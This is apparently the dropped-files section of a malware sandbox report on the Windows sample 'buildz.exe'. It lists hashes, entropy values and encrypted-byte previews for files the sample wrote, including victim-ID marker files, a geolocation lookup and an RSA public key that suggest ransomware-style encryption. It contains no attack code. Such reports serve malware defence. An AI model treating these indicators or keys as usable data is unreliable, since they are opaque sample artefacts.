                        Size (bytes):104062
                        Entropy (8bit):7.998090416324751
                        Encrypted:true
                        SSDEEP:3072:YFaknsTsnA62FHx9c7ARV4SI+VK/WxUEZA:YIAxx2dc7AUF+4DEe
                        MD5:4D72AED57C94B3322ACA03D96ED096BA
                        SHA1:3B466CA4E80436C7FD8CAA9DD2C42DD79BEC3886
                        SHA-256:90967973ED65B28387068F0B73E0FA2C7B39BD92C8F0BCCFE44A64A6D310B1EA
                        SHA-512:B78D4B6351106FD3258448811CEC4B9AE14427FD85513AD39915D4DBF975EDB75415F2C4ACB87419DFE9F2BD291FFED4A84DBC68DA04096F9849014B5BAB53CE
                        Malicious:true
                        Preview:....h...l!..[z.m..._..`bm"\...e8....l.t.....h...Y..q......[T.!hI.....kG.....D...[....V.;w ...`{+...<.J..e..!....;....}.......Q_M.X$B$...i.tlL.o..|.{H.l.....a..l.a..!-5..V.wM$o...n..S.......F....8.N.1.._...x.....f.........e.w...:R;>GiyE.3..2....DN...N...N.".n4.c=vE....@.1g.u.H......3..&p...B.,.E]Z.Bn..1y7G...WJ.\V.m).P..^A.Y.U.....8[^...SGE.>9.....Qi....>b.m=..^H.....S.M|$B;......#..:...y.zQ..5(...}..1......q..R..;..............M;..!......7.......G....u...K...7.ae..d.zE.D|.......B.w...gR.....a......g....@...USw5/.2.g......K.w.<.3Tp...._.......=..Q?.&..].........P...."..z-=..._9X.ni.o|x.X.g..kZM./U|R....[.G.N...p...P.['.V.Q....0. xk.c..u.E7H~.{X........B....@../...,....n..@..(...%c..f..;.2..-.Y.m.2...........jHB...h.....&..5.5.~.....g..aU..`.9F?S..F.....{..7..KD./(a.gt^..U...t..hS.].K...D.-....\..)...Vj........J....l...b...nq`....r..K$Cv.S#...6..rC..W...F.@......&..l._...{..k...i.v..T..u....{..:....O.z86...X.P.._.l....vs...Io..5.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):102814
                        Entropy (8bit):7.998106595806861
                        Encrypted:true
                        SSDEEP:3072:nZIEG0CfaI5s9qSCEph9BVZeZ22mVQLhIwBEA:ZI5ZaI50CEph5ZeZ22mVQ1ImZ
                        MD5:79A477B6774AB302DE19DDA593247578
                        SHA1:9E2285E3BEAE469CFDD3C1201ABE6B7638AEE387
                        SHA-256:6EFF8CA355A0486CF01FCA24D495076370302950032877E6471D4F7F86B71958
                        SHA-512:3B5ABCE6446A80EE5AFCAA1593C1168D8C6DEF071C25B11B46E22AAA0B95BE172E6354C6B6ADB853137CF6A1B8EC25BF5DCDDFCAD0C8A70FEB800240C3E08BAB
                        Malicious:true
                        Preview:....h..r.Q.........><-...D.s.....$..2..../?.h+.b...?.J.=`.l.J......:.k... ..P....]<.S.$=a.... .a-..xb.C.".E..{.....0wzp.\..(7..E.R_`.......x.[a.:.\...z%..|G.2.3..H..f.a..z...vO..'.....+5.3aUQ.....mn~./. Q~...........b..xG..TS........qt...7t.ap.....$L...X...@`......x.#..C&>.....u(.;..@.<D.!<....y.V......jQ.FNg.*=..Q.Sf...&..d..d.yK.#..=....,....W..F.|.S..N....x.H. .a.f....v..K.dv.h...;...mx;0..Xg....L.ax....={..Q.KA&....o..?R.A.....<.=/.n.Jj....$}.e..z....><|\...u;qZ.....4........S&{.4.d~..N.R..Y.:.E...>...of.4.=h.r.H..K.1.+.#...U.....gZ.9.......Y...(4.h....L.xl.%..t...:....LS...R............d.$].Yi...E.(..."..7.../(6..g...r3.....,..f.Y ......*sa.'...6.s.{]......J.u....Q........,.`m.=%.:.......y4TlM.#.N...[..t...b._.i.......k..6....O.X.....^....J....L.=.K=.O......2..]...8..+.Y..Q$......p.".Nou.......`[.y.3 .J.!..Y.. ...X..M_.v3..I..X.g.!. .~ ../.......yM...cJ.m...m..j.4.Q...,...0.E.~.Ip6,!.W..a...,.~..N.....`T}....@.....D...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):75398
                        Entropy (8bit):7.9975563561727006
                        Encrypted:true
                        SSDEEP:1536:LAhdPBXM+FXXBAODUPjyw+KBgVKjrBO4rjltI2dmGceONVc669eA:LA3BXXxbDU2ZXVKjrY8lqYhc46AeA
                        MD5:194D81260BDBF1271546584FF0CFCF58
                        SHA1:83E75EE0305A3EEE6E5611CC2779AC8D5633F625
                        SHA-256:2E666182DAEF8E54A147B37FBC3778160EDEEB1A235AD7DD5C6200564BFEBF2D
                        SHA-512:85FBEF5AB1E492AB0C44F75CD61D9CF9D1BCDFFD33284F41ECDEAF1C0E62E536B959782B4C432BB36454B2127E6DFB93C822D23263C7FD849FB034B6B2CBC63A
                        Malicious:true
                        Preview:......n....c......?..O..i;..X..M......RtXp..1.+'.7..L....31B.E.2.{.<'........g..).7...>..d..I.3.y.D.j.is.w.(....o.7!.....%..#b..}....KWDLN...w .2..-On.....'2.'h....w...(.?....v.....~.xOs.[.#.....9.1i...h./....Qk~z.`....M\((.&....jtB.&..}.........4.0......7....5*XOH.@.5...5.A...=.0,.3.|f..{...:k.c.........J....t]S.2..^'o..*n.....'o....Q.?..s..*..N...N........Q.~j.j.<...8../.p...k.....d...O.|.....($.. .:d.=.z.."Pr..T...D.o..h.........w....bCU-.9.]s.Wf~+#Te........~..z].Ez.._q......-.R...+.0h.'p...8..%c....0...tU.p.D...&%C....2n...g..[.{.5.qW..~.......(.6...G ....sa.^.TSY..STc.a0u?.....V.4.}...vF.^..|.....s b..~%..s...F....`.|...>..%..jP@N...6.'..D.w.S.w.z..Z.(-G|.E~..eG.BML.hPr3...y_..:..py.}..\r.;.v....#..".>...}.. S.C...}.$.....P.N.:w..j.L.a.4.;.x..d.....,..".`..K...%.:.hn...........#Mv.)8H..j.wU.a=...^.e.p.S..6.._.....I..E,.G....78f...#...9.+B.R4.F.b.).8.W#B.[.$.@..&..d.e.mk.%6.}/$j..>.Ez8;y_.*...g.e\....%9..kU..._^.......h@n...aW......).rW....I
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):105318
                        Entropy (8bit):7.99820020089109
                        Encrypted:true
                        SSDEEP:3072:B/MjfQ9WVK92qP2Xc71GdMHEQJYwnZyJpA:BMjIjsK71KMHEuYwnQA
                        MD5:37C95AECABDCDE8D4A99AA8C3AF0CBDE
                        SHA1:7928B126D9E10EDB2A30FA2488DCE44F1EF911F6
                        SHA-256:B1DA60D938D4110424BB8C1C4A1C8EEF3736A84B5C40A93296E511707419CA39
                        SHA-512:4CC42828716CA87EB67BCEFAF0D1E974665BEA1251D44E1CA33F3A3452C5AA636E5BCDA1A3232D1E99FFBB13217E854BCD75EC908B6DACF56FDC9F713A58A6E5
                        Malicious:true
                        Preview:.... ........'.d..knw..x#}.^.......j;.c.P.......Y.R{;.........".7<....PG<..>...W.[.5w\8`..F..........bp.../8..H[.5.H.i.\)..!..Y.4..WE.d3"..Gl.y./.u.#..v:)...Tx..G3D...1..I1?...].t%<U....$.So.9.,sWM.:j9...H.....y;q.....E.\....0.,.{l.n...'...G..{....yhc....yO...W......U.]#..r+s.!gCb...\.'..e=H.;.o..PAJ..._...tQG...}.....Iv..m..3.9.....K...{#1r.el....w..{w.hh>..6C.C.1/wl.....E......`;;......~:f...W..:ER.!B.....@1.;.C]...Pv.9..../x.....s.d.!EO..&.b.\jt...c.OX.:*o........_...py...r./W.+.m:.........[.z.vI_H"..X.^...L../v....tp...}..}).[w...l.90B.y..y.]..."..y.nNM.u.C..n.Ke.....]...A.$..]\.4Vv.."L2-.5.F{3H*.-.(...-..,....c.P~...Z..Y]...|.F..un..='p[:.....o..iq.^{....c.T.IO<..3....z.....OQ...&.&...*..\.G..=E...+J..>.8...{y0.6..6^Oy.....)...Z..:.1....$....D.,Cp...2."$...j..../.....D]..v}...ASn......}v..}!I.,........x|6....z..........X\.p..b..6a}.....P.f..h.d0.c...j.=v...W.;5@$.w........Y<.i..@...B.Q.......Rq'9...\R-.:..].j..}Z.......;.|....:D.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):581966
                        Entropy (8bit):5.738469265656969
                        Encrypted:false
                        SSDEEP:6144:Rnve8lOYWvjqWZynzd0M6FiNa1mYSOb9x:9W6WvpyneFiNGmpU
                        MD5:9BAAECAB796913FD6BCA2D3B4595E7F4
                        SHA1:EC9BD25299F799D55B3423962964AB2192D17056
                        SHA-256:992A84021E3BEA5D62C754D53EC3D4FC54FC79BA39D50D1584E6BB9ADD356BDF
                        SHA-512:9C17932F736B394F7DC40B1EB5DF2F45FFFE0C0D2A4F6DB1FB10B2CE1DF101D990B602B08A50B6F41320CE8C0CCB6F3A193DF77CAD65F16A65981211F4515DE2
                        Malicious:false
                        Preview:. .......{...P..;.Q.'.3..|..R.V.!J.6..5y8_....H......P9MZ._.-...A....dNY...t...b..A...w.a..EK..^.."O...i...s..>...pW.<y\6.s`....|.../..R^....B?; .^...)>...0.....&..FD..u.$2.U........|`.h..E!c...(...!<ohuJ..G.F,. .uHz.^.q...@...f....a.Wd..h=.....N./..HpZ..i...^.*yQ.o...Mg...s<.v....$V{+w...8.$y.5..N.../A.Z..'..~...N....0.W'.p`^`.......xm..+?>.....z.-..u....F4.. ....]...x.sV...:..n.g..........O.w..n.|.,....5+.....S@q....Q.CuP.5...63=..N./.;h...gu..........ii..I...%.1......f.c.o.e.L@.k.xg..y'|.....NyW..c.....q%.G8.#..'.T.q#?M......Gd..m^W.._ .q].-q.....N...2)..F.....|.q%.....w.h..45..*..g:G...%k......_...&..)....eZ...4.....d.D..{W<...W......D.^.b..*Y..1.jPc...a?F".9.sX.`mT1.....K<d_o.F.Z9B..g.U..C..........[..z_.....s..(KO4.x.+.b.v\g..}@.C....ij]E....gV..R..........SK.V(..q......|..6v.....a....".N.E}....J.'G.r.:.c..E.J...J.{`....1`;*..$.3es...v,^.5.s......\5f..r~.6.c...{.,.f:.<4.S...$..w...>.*..f.D...b#.w..'.?Ih.&..W.C.5iO}`.Q.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24910
                        Entropy (8bit):7.9931908111340055
                        Encrypted:true
                        SSDEEP:768:DRv3G0TQ9A2crfbKBF7yQv/DyWBZg8M6jtHYsF9uA:NG0TQfk2fyoLVAIt99uA
                        MD5:10FAC53A417E9A4E8CDBA32DB0A99C32
                        SHA1:54185BE61AF0D0862E8B13055A8FCA5F21BDD9F3
                        SHA-256:DF21DCFC9D52CA0A14FDA2A73655ED60571F22F93DCEF2BC75AE2AA749090D01
                        SHA-512:3E22CA392A9DB66DDCB9F824A8FDD9BCF2E9F3E08E4D62BE1B0CF32512ECD0825F3B899636B42EABA5E632BB6429EFFCE9A0677C0BBA5798442A0CC12A30E860
                        Malicious:true
                        Preview:. ....~.....m..z......E.u.W...2.H...{.qGt...C\....fg.e*.+3s.....9.+zeli.a...M{.o....ao.9.F......{!..B."D.5.....7.....HWAh<.J.s...d.\.C.f.$.G.:.tk..y}..Z|...N.t.....m;PU.lAGi.........6n.ui.W.M>.{.R.....dZ.yRC.'.'T.`.Bp<....mn..o&@....I..........].`c..... .~..X....z..2<....vMF..Dr*N.`..f.8..\..GK*_-.R......@.jgQ...U.e..ud.....h..\j.....w...u{J.ZT.T'...@..S......N.N..(|W..1Z.".si.7.k..C.<..X\ud...&.9m.%..WTd..V.~../..I'.F.YQ..0....J8...^t.xx]2*.Pj.{R.....:...m....D.5l....rf..l&.w.S.z..N..!z.XgJ...M....2v...e;..T:....z.]h'.........e..\oE.~{.....g"......&h..................o`#.?...$E....n.3.P%.....-...qK.hBB.}}.......\.r...o.uZ.0q.r...^.. #.tt .._.#.............a...+\o....,f.g...6..g..uq ....7...b....*....C9tt.....[..q_h....}.6.G%..9..C..P.4;.....k...wt...A ....Rpm.t..........K.Z*G.{.M....zd..J.N...[..#...s6...Y.XN......k.;@..r2..]8.Z/4&D..c..E......}._.%......)....DN5E..@....z{.q.6o@.........e..q...BMXh.)a...n....N.U8....7..9...4\..1.A.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.30543915475454
                        Encrypted:false
                        SSDEEP:6:UM40C7fEyZzG/KDsFZi7Xi2cACuOznrnOCkFtZ+WAGK3BFMr8FGcii96Z:/40SEylrAKDi2c5uOzbfqz+jBF26GciD
                        MD5:3558A3EF8A9188CC8DC55FDC474FE23E
                        SHA1:4C127463BE13EC66479B23712DA1B01956C74697
                        SHA-256:AC8C80773B839434FDB7A9775ACFE7331B8FDBE89B8B6B98FE002D952C3B6EC6
                        SHA-512:138F18F9DB0405DB8D29CC0E805B0CC6ECDA9DBCD6C751D21F38A012352DC50161C7CF760413F379EF0BD7F7E9F1FE548ACF887C58CE64AC635A9057B593D6BB
                        Malicious:false
                        Preview:CMMM ..j.........:........|.......8Q.9[...H7.u..c.6S.7..E.j..[f...Jd:...Or~.v...c.......*0,JE/. .\..{O.L....4)osX...:-+..m/.8..l......Z.d$k....q.>2w.....+W...6r....3...}.."HHEW...(.j7.i..........C..u#.....t..1..5..Y...1..Hk....._)..f...@.q...U.......=.5..d.d.56.d.;.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.229056534732344
                        Encrypted:false
                        SSDEEP:6:9tX1M0VJXfVY1IUjbdx9w+Reki4pf/V4jaQh36fDc4NCSYeSC6fjMr8FGcii96Z:9x1hVHTA57iQirh36fDc44S/Ofj26Gcq
                        MD5:1FF998B72F5A1831BA76DF42F700CB8D
                        SHA1:324DFBE9D261EE59EC0969A03575C64A3322CCAD
                        SHA-256:041F051ABF1491DD198677EA4A459C1F1A4E5F586780E8E2C3F2F5F37D3F4528
                        SHA-512:848CC235FCAEB238F2B6A1B5060E0DA382DF043FE4921375C5E95C10C21CC38F51F425881E6DAB7D90FCB863907799F818294CE13D02E003D88A66CCA57ECC41
                        Malicious:false
                        Preview:CMMM .....:..<q..`....p.b........L.......p.n...q...\7.t......w}.....D....|.~..0.....p.....LO.c.h.VK......NM.+......?...`B%^..c\r.n8...H..]..7....7..4..^7pO.{.....0%w3.,..c5..7ZT>.n..m..4.....Wk..W....zb...<&r[...[......6..f.....n..gjV.t.w...%...U....V..........w.M.x]EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.317961919671782
                        Encrypted:false
                        SSDEEP:6:Stw8XNmYlo+i+eXJSz5pKLKj+Hn1DKkz+tp/G8BoJw9ydWp0ecrks4Mr8FGcii9a:SzNvloY6YtpQ71DKkaGZ+9YkH26Gciik
                        MD5:CD87FDEACBFE440E09140A76B483415A
                        SHA1:F474209C5902D1B67906E2C270FADA1E5F648275
                        SHA-256:86193E673F2E2E62BBFDBC82A3F9FE261E5825DCBBF5DB63535D2535CBC9F657
                        SHA-512:3C6FF24D81A9403FB9F4543568C383D8B492BEA1DF71FF148992872351ACF9DED93327BEF6825B99EF72EB2009FC460CED0CD296D9116ACC1BA942D707255B83
                        Malicious:false
                        Preview:CMMM ..e*.D.t.......<2ir. 7r.H..w.xU.IaGH.=.....O....@...frn.8l..O.vP....,..........uk~..k....k....M.d...q..7....o...HDr....A........|.2.`....X...Vq.....S..P.Cy......0..H.y;'...k.n............k..F @.o...# d.m.sc.[.)Rv....Yi....3.+`.o.b...._.....{...>..3........EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.238505294046434
                        Encrypted:false
                        SSDEEP:6:QEtH21hcUvhjGiiZ7JgaLY9fyf4kBziUA1geM6Aru/cU/Mr8FGcii96Z:t2TvhWXgl9fJkBziUAZM6Aq/l/26GciD
                        MD5:02E8D12935A11B6B209282EE851436AF
                        SHA1:DC815A5A413C1A234E5011175791BFCFE1D26459
                        SHA-256:9E0381643B81E02BAE7310C928660B7FAE6E45DA6D0C3F1C2E8D69022FF8953D
                        SHA-512:EDC79D1DEDB1BB67C8AB0D63F587156BFE25CF567541DD05860901CD692C984D5660672230967153DAC020FEE5AE4FA5F17D67DE034696177024FAB18D5C9888
                        Malicious:false
                        Preview:CMMM Q|..Zj..f..N..?.....\&Y i\..7....u....\....8 .....L.......i..]........wj..Y.Q.!..L-.s.....F...}.Oq..........%.?B...{.G,.`....D..-Z.Bp}IS..:..8...........).@..O......;D.. ...7e..D..r..'..wr[.J...m.....WC.#.=....X\`;d...tI.0S.w:....Pz.UT.....c.C...D..4C.I.DS.'.<y.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.29501291584155
                        Encrypted:false
                        SSDEEP:6:eSt01iN7UsTW0j6bfF6P01ViJnDmiwD3O+vzqBIMr8FGcii96Z:5Is76bfF681w9Ee+vcI26Gcii9a
                        MD5:699409D804AAFEC85530B2E065601751
                        SHA1:204E37B5CDDA25E47875385D849362F111A7FD9D
                        SHA-256:274AF7C1159D3A0F537C13764E1AC696A9D0D654898E635CC16317B0171B6C4F
                        SHA-512:2B2394D89980159AB98ED97F1F76553D495E555B99264A2790E1AEF17C55955BC6CC4BCED0E23CDE41451B6FE633760CF3015CD21D6EA6461930F6807E26A7BD
                        Malicious:false
                        Preview:CMMM .......j(.D...G9.e.&....A.W...E......Y5..R.:Z..F..k.K$}...e...q.....&....v>.Z....8.....M=.Q.t^z.d.3.V...).c.A5......2..n......[..'V.Or.|.8`..`A.q....@...+..^].5......gZI..?...t....4. 3Z..!.....=...8.7.S....M.t.Bd....0M....B....*|.\.a..+....p..r.KQ.](.."4a.....~EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.26642292553996
                        Encrypted:false
                        SSDEEP:6:08A6ZSqwqOustLKadyNCrCkBsqs/fMD4xO2rYUIYXnKuUV8M33yFMr8FGcii96Z:RA6MqOushy0ukB1+O2rYUIYXnKuU6M3F
                        MD5:91D3F865850E8D142629B120D8A8DB36
                        SHA1:46B8E353218D5DABD86EBB6D31C294CC4078BB41
                        SHA-256:754CF7D9F3BE74022780F90633A5D5D241BEBA2B3166DF2F3D154FAAAC97E7DA
                        SHA-512:4A93B0C76DB25AE7919299837206A038593077FCB4456F6E2FF7A2EA1CB73A62A43ED09335401132F5B18AF9EFC997D4C4F5D13EAFDA7F2CD88720ED89506012
                        Malicious:false
                        Preview:CMMM ........)....~.a..N+....J._..R..8E....MV#.H..*....4..&.Q.B|.z..1.%...B...{.&..D6%..g...~W.-..t2.=........s)..Es.+Le...{.}.3...,..:..F...-7W. .V..<.Zww,...4..E...Uc.B.v...S.O=.@&.bC...H...?..t.l.:.......\...D...:.fqP.(5...Mt....7al.QT&...n..=..>m..%S.;.(.{..W.kEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.206555759515907
                        Encrypted:false
                        SSDEEP:6:cFcs8LzxJwaRe93VbgcoKcq83YlbZ27n51bGdWuFMr8FGcii96Z:8czIvi3KZ8IlbZ2751qdWuF26Gcii9a
                        MD5:6F7E78001725AD4BEAE825D05FDDACDD
                        SHA1:C472CF3C598EC96D8FD462219582F815E1F5050D
                        SHA-256:F2718BB2250176E07108AD3D758D71CA2D5BCE1F1C32269F0DD07E63A9D12368
                        SHA-512:99CF6142B37002CAA7523E5A880053F3527F10462C711E0368A0AE5267CDE4D57E9A174B2F2D8D8C696D50F269331ACF639BACF9E669EC4A611618E649B9DD4B
                        Malicious:false
                        Preview:CMMM I(.8.g..z..]....Z`...Wf....]j.]hz.+.V9.{..1...D.i......`.]%j..._U.s.l%-4.C..n.(.1c.2.....}.`......out.V.ARCx.k....H......"rq.G.....HE.A4d..A.1N`^..X=2.x.K#8.66..L...p\p.w...MI..G1.......+....Q..A,..k....c.Oz...Uh....Z.....n......+.)..v.^.O 4.aj.}_..;............EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.214224009413607
                        Encrypted:false
                        SSDEEP:6:22tUM1OAdSXyIYG0SHupqOR4vHalScnvL1zN8ShZ03nMr8FGcii96Z:22tv1O4SiIYG6pQHu5lN8Shq26Gcii9a
                        MD5:DAC41143A5F1B5DF8C633B3401046B1D
                        SHA1:8B4F8815D2B03949927FD16E1CA48AC0791C2120
                        SHA-256:AA807A9D885C6945EAFE4AE8F2371C41B852A15F7A9D1D3C176F9D74F912F69A
                        SHA-512:B41F86076026FCBF4389D1D41345202467E3E6EB5D40B161C94F69E1AF5575B3E14F00B08065A93634AD0EB8F28673CF87F6F9EB707778C7BCAE7FF68DA87720
                        Malicious:false
                        Preview:CMMM ...sqT.R..h..$..<1G`.......B.8M....I...=.4..a.@.;.......eOp.S..-..C-4....<7.....q\./^....t8...v.M.-....~..$....~...L_.l./.H.=M..h..;Z...[....6.........kM.c'.........i...W.}z.n..>t:...=.p........i..b2..:}...q...n..^.....i... "U...".,'X.".~X......:.@....<#kL.8.k.vEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.211629632616344
                        Encrypted:false
                        SSDEEP:6:A77XpYpVOjt6J6B5jJWCAFyAkI9tBPv0Q4ywaK0gxuMr8FGcii96Z:mXpYLOYJ6Mr5tB0HyX9F26Gcii9a
                        MD5:905AC82DD86CCDD3478519FFCE0574FD
                        SHA1:3B5EC9FA29D1FD8B9AB571676B755FC714E656E6
                        SHA-256:2D196DFD743B2957D6F1CCC17F8A606A25A6214D8C49FF6F0273D155F2E1E4E6
                        SHA-512:3CE6AC6FA872D54E2FF470FE0D20C4CBB15B93ED111013518E64B4CF9D6383253043435A41D6DC8251A54A85A5065910357E62A40B23A7A4A3E63671FA2E7353
                        Malicious:false
                        Preview:CMMM ...;...Y...i#.Y.d.@.....IL..q....U..t!..BkV....=}..7|%..3...).:.... .kR.. .=.J..G..H...%..Qp...$.w...w.y.7.l..l..,^..n..u.\W.`)1..!.....7_....g..i.o9...ip1......N#JpxC...Ni..I.F7..3Ljm...w.7F./.F.'.........U....RJ.....2.8...!....k......~.,B..r.......p.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.246095265095779
                        Encrypted:false
                        SSDEEP:6:iUYG9mC6cmUDrVN/9Jq8QUU7uBDvtOhmyH2Yts//608d/Ahtk/Mr8FGcii96Z:i3Vj2VRnqgEupyHPth/Aw26Gcii9a
                        MD5:8DF1CA58A0F0A3CE46A607D6DA450068
                        SHA1:18AB20F5C7F8CB9395A8E9E8E6A6A2C5EA38DBCD
                        SHA-256:6BD1D1D12402CFF9ECC882D5FFBEC232E62034B8148FC0C29A581A9AF77AFD67
                        SHA-512:6653662622B2AF92C3794C81D8A23C89C7FBB038E1139848DEE1DA61EE44B0683255F9018409869BE21A75CA244228A98DAA07026CF11291CE26DC41C2C71E35
                        Malicious:false
                        Preview:CMMM ..d.1...>.>.K!..S.}...C.Z=L}FDJhD.!y}.{..5., .Ez..1%...*.Nd..WV.N7.+0.. ...V....c.9.......y.... ..p9.}8.=....B../p.X..%..".J.. WK.T...U.$..%.svhq.!...y.......e....<.x....r...sE....f..r.$......E{......b.Y..9.]..m.n.%...+.........E....!..+...y|.`K.+.R-.JD.?EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):411
                        Entropy (8bit):4.6420780896559455
                        Encrypted:false
                        SSDEEP:12:Yd9wpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdgHD+CtrRQVctrRQVzRZQ3htrRQV/m0
                        MD5:EDCA7C5EAEC41C2D1880B6161721C8BE
                        SHA1:9A650E1C3E6B7E8858A48D55F21C10C99EBE8AC8
                        SHA-256:CADED2E85735BEB1518F1C907BB108B1DCD9C481DAD682B7E0A8E1009C541065
                        SHA-512:2C39E15ADEAC90FB6D8F5F87B384F86A79E15F0582A4E8618C264FEE7223958E2F51AC5FA60001F95AE215351B677D91718E551DAB655B14F532556CC2D6AA7A
                        Malicious:false
                        Preview:{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):563
                        Entropy (8bit):6.005573195397861
                        Encrypted:false
                        SSDEEP:12:YGJ68azoN1prvCCLgT2zgtSQrKbtRFDWo5Yz26X:YgJ7N1dzgtSQub9RW7X
                        MD5:6C4873E039C5D4EF469BBD0561A5A159
                        SHA1:8577569BEC5F963BFBC99C07D7444F90950B6BFE
                        SHA-256:847E302DCCF65EE6B033097EE3466D270E32A79042AC28E0CD1E0DB63196C011
                        SHA-512:673B1E36965D2F9F6E43808238DEAA08C55692F32829ACC75BD73470CEB3FAB270C90D5B674A78FED08553A38CADBD3AF82D42CB44CD0486C0733753552CF7FD
                        Malicious:false
                        Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9a+39KvxLsYPrv6lKgo\\nx4\/c2rM3rm5lx5\/J\/Kg1xowtsS22bI2rlkIPDXeg75Dtl+3\/8U9jjGgm\/KYkfQ9V\\nQMqDeFChxqETWOfKCCtXsAk6inFO8Tyh3LHuTo120PrhZH6BZAbNJovCB7nWS4qy\\nffa3P2R6WwXP3UL8nVfh0v\/WvS2EiIFoeurK5pEIY56T7SXb\/M3XvE7jy1BenpuB\\nfPuN6y82QtpDmZ+8a9lM\/wFeoSVyFk0MBVjyaMb9HQSX9iL8LVDQYNoOW6OmwEzu\\nK5ckQEl8LQYfQTR17DG0fdvwXpopOF\/1rgAZ31bi5Meoj8UIaCGYbsarvqPS60G0\\n8QIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz"}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1583
                        Entropy (8bit):7.8819768320237245
                        Encrypted:false
                        SSDEEP:24:YvD4nuD/bgEbav2QFfyuqcUzElUlCHqGhEzEu4nttYvA2IOC2RuiGaR/tyln6GbD:Yr4n2bav2QF6bcUaUiq+LYIz0kaVw6UD
                        MD5:3B8F8F3744229679100E0E596741879F
                        SHA1:7D5C1FF0BCD10843615F0AD653043EAF0CA04BC2
                        SHA-256:BFBC0151C85049E4BB0D8F01B38C355A036D500AC9C330FB396F6485818841B0
                        SHA-512:6522CDA0B8E9794E4E4DEA6302ECF3FF47991AFC695954D12E4DE81E3C2065AB3E6FB369D0177C16BE6517293A40814666AE0AAFC7C3F7B9AE9AC951823E05B5
                        Malicious:false
                        Preview:{"spo..}.w....U..O,.........<.%.i.......9<K..AJ..U.i:j'BpS.....I...`...........1L..bL...E.O.....H^3.r..."..\.7t.F..b..9.f......N...Z$xtL7....5d....@....M..k..v.I..*...tn/...2<..E.0@..1,O.sHV..Ds...Ao...C....*..arO.8.Q%.d.KD..WD......@..A..r..p.~....._..I...0.V..5.'....NYN..Q.5......X?.]...-.b7..2.H#......:...o.J.....|!....?....K..=4.5%7.fV.N.M..4.C.........}.._m.^.....F<1..LF{.C!m..g..7p.9.I'..v.E...(.l..........4..\P../3*&ad)8..8:.E.... :6..&....6...p.....GW.@}.Le...Ic.L..e.Zo....JH.u.cu..]{..*.........fWI...8..w...i...9t.g.v.j.U..oPDnEl%.q{O...Y..8.'...$.8_.....F.....-..`.L......K,..]d+[..K_W....Qj..1....sb.[.b.kk...6..D..).x....*..R...6VYVei........*...j....!.. 